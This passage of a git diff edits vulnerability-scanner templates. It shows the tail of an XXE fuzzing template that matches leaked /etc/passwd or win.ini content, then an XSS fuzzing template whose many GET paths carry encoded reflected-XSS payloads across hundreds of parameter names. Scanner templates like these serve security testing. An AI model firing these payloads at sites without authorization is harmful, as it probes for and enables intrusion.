"{{xxe}}" + + - part: query + values: + - "(" + fuzz: + - "{{xxe}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' \ No newline at end of file diff --git a/http/vulnerabilities/generic/xss-fuzz.yaml b/http/vulnerabilities/generic/xss-fuzz.yaml index 4e0291ab94..bfdc836c0f 100644 --- a/http/vulnerabilities/generic/xss-fuzz.yaml +++ b/http/vulnerabilities/generic/xss-fuzz.yaml @@ -3,49 +3,52 @@ id: xss-fuzz info: name: Fuzzing Parameters - Cross-Site Scripting author: kazet - severity: high - description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests. + severity: medium + description: | + Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests. classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 29 parameters: "q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year" - tags: xss,generic,fuzz + tags: xss,generic http: - method: GET path: - - "{{BaseURL}}/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E" - - "{{BaseURL}}/?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E" - - "{{BaseURL}}/?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E" - - "{{BaseURL}}/?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E" - - "{{BaseURL}}/?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E" - - "{{BaseURL}}/?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E" - - "{{BaseURL}}/?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E" - - "{{BaseURL}}/?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E" - - "{{BaseURL}}/?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E" - - "{{BaseURL}}/?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E" - - "{{BaseURL}}/?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E" - - "{{BaseURL}}/?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E" - - "{{BaseURL}}/?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E" - - "{{BaseURL}}/?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E" - - "{{BaseURL}}/?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E" - - "{{BaseURL}}/?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E" - - "{{BaseURL}}/?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E" - - "{{BaseURL}}/?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E" - - "{{BaseURL}}/?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E" - - "{{BaseURL}}/?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E" - - "{{BaseURL}}/?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E" - - "{{BaseURL}}/?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E" - - "{{BaseURL}}/?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E" - - 